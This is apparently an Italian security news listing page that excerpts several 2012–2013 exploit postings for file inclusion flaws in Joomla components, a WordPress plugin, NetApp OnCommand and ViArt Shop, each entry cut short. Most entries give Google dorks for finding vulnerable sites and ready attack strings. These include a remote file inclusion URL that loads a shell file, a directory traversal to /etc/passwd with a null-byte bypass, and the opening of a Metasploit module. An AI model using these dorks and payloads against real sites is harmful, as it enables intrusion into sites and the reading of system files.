Joomla x-shop

17 maggio 2013 - Fonte: http://www.mondounix.com
Title : Joomla x-shop <= 1.7 Remote File Include Vulnerability
 
--------------------------------------------------------------------------------
#Author: Crackers_Child
 
 
#cont@ct: crackers_child@sibersavascilar.com
 
--------------------------------------------------------------------------------
 
Google Dorks  : allinurl:"/com_x-shop/"
 
------------------------- -------------------------------------------------------
 
Download :  http://mamboxchange.com/frs/?group_id=187&amp;release_id=1047
 
--------------------------------------------------------------------------------
Bug in admin.x-shop.php
 
<?
include($mosConfig_absolute_path.'/administrator/components/com_x-shop/languages/'.$mosConfig_lang.'.php');
session_start();
 
 
--------------------------------------------------------------------------------
 
Exploit:
 
http://www.site.com/joomla_path/administrator/components/com_x-shop/admin.x-shop?mosConfig_absolute_path=Shell.txt?
 
 
--------------------------------------------------------------------------------
 
greets:
 
All...

Leggi il seguito »

NetApp OnCommand System Manager 2.1 / 2.0.2 XSS / File Inclusion / Command Execution

9 maggio 2013 - Fonte: http://www.mondounix.com
SEC Consult Vulnerability Lab Security Advisory < 20130507-0 >
=======================================================================
              title: Multiple vulnerabilities
            product: NetApp OnCommand System Manager
 vulnerable version: <= 2.1 and <=2.0.2
      fixed version: 2.2 (only XSS fixed)
                CVE: CVE-2013-3320 (XSS)
                     CVE-2013-3321 (File inclusion)
                     CVE-2013-3322 (OS command execution)
             impact: medium
           homepage: http://www.netapp.com/
              found: 2012-11-06
                 by: M. Heinzl
         SEC Consult Vulnerability Lab
         https://www.sec-consult.com/
=======================================================================
 
 
Vendor...

Leggi il seguito »

WordPress Advanced Custom Fields Remote File Inclusion

3 gennaio 2013 - Fonte: http://www.mondounix.com
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# web site for more information on licensing and terms of use.
#   http://metasploit.com/
##
 
require 'msf/core'
 
class Metasploit3 < Msf::Exploit::Remote
  Rank = ExcellentRanking
 
  include Msf::Exploit::Remote::HttpClient
  include Msf::Exploit::Remote::HttpServer::PHPInclude
 
  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'WordPress Plugin Advanced Custom Fields Remote File Inclusion',
      'Description'    => %q{
          This module exploits a remote file inclusion flaw in the WordPress blogging
        software...

Leggi il seguito »

Joomla ZtAutoLink Local File Inclusion

20 dicembre 2012 - Fonte: http://www.mondounix.com
[!]===========================================================================[!]
 
[~] Joomla Component ztautolink LFI Vulnerability 
[~] Author : Xr0b0t (xrt@gmx.us)
[~] Homepage : http://www.indonesiancoder.com | http://Xr0b0t.name | http://mc-crew.info
[~] Date : 19 Des, 2012
 
[!]===========================================================================[!]
 
[ Software Information ]
 
[+] Vendor : www.zootemplate.com
[+] Price : free
[+] Vulnerability : LFI
[+] Dork : inurl:"com_ztautolink" ;)
[+] Version : N/A
 
[!]===========================================================================[!]
 
[ Vulnerable File ]
    http://127.0.0.1//index.php?option=com_ztautolink&controller=[r0b0t]
 
[...

Leggi il seguito »

Joomla Bit Local File Inclusion

20 dicembre 2012 - Fonte: http://www.mondounix.com
[!]===========================================================================[!]
 
[~] Joomla Component bit LFI Vulnerability 
[~] Author : Xr0b0t (xrt@gmx.us)
[~] Homepage : http://www.indonesiancoder.com | http://Xr0b0t.name | http://mc-crew.info
[~] Date : 19 Des, 2012
 
[!]===========================================================================[!]
 
[ Software Information ]
 
[+] Vendor : JomLand.com
[+] Price : free
[+] Vulnerability : LFI
[+] Dork : inurl:"com_bit " ;)
[+] Version : N/A
 
[!]===========================================================================[!]
 
[ Vulnerable File ]
    http://127.0.0.1//index.php?option=com_bit&controller=[r0b0t]
 
[ Code PHP...

Leggi il seguito »

ViArt Shop Evaluation v4.1 Multiple Remote File Inclusion Vulnerability

26 settembre 2012 - Fonte: http://www.mondounix.com
############################################
### Exploit Title: ViArt Shop Evaluation v4.1 Multiple Remote File Inclusion Vulnerability
### Date: 26/9/2012
### Author: L0n3ly-H34rT
### Contact: l0n3ly_h34rt@hotmail.com
### My Site: http://se3c.blogspot.com/
### Vendor Link: http://www.viart.com/
### Software Link: http://www.viart.com/downloads/viart_shop-4.1.zip
### Version: 4.1
### Tested on: Linux/Windows
############################################
 
# Affected files :
 
1- ( /admin/admin_header.php ) on line 13 :
 
include_once($root_folder_path . "messages/" . $language_code . "/cart_messages.php");
 
2- ( /includes/ajax_list_tree.php ) on line 29 :
 
include_once($root_folder_path...

Leggi il seguito »

Joomla Hello Local File Inclusion

20 luglio 2012 - Fonte: http://www.mondounix.com
#################################################################################
#   Title : Joomla Component com_hello Local File Include
#
#   Author : Ajax Security Team
#
#   Discovered By : devilzc0der & Dominator
#
#   Dork : inurl:"com_hello"
#
#   h0m3 : www.ajaxtm.com
#
#   Software Link : www.joomla.com
#
#   Level : High
##################################################################################
#  p0c :
#                com_hello&controller=../../../../../../../../etc/passwd%00
#
# Please Use Null Byte ( %00 ) for Bypas .
##################################################################################
# 3xample :
#
http://SITE/index.php?option=com_hello&controller=../../../../../../../../etc/passwd%00
#
###################################################################################
#...

Leggi il seguito »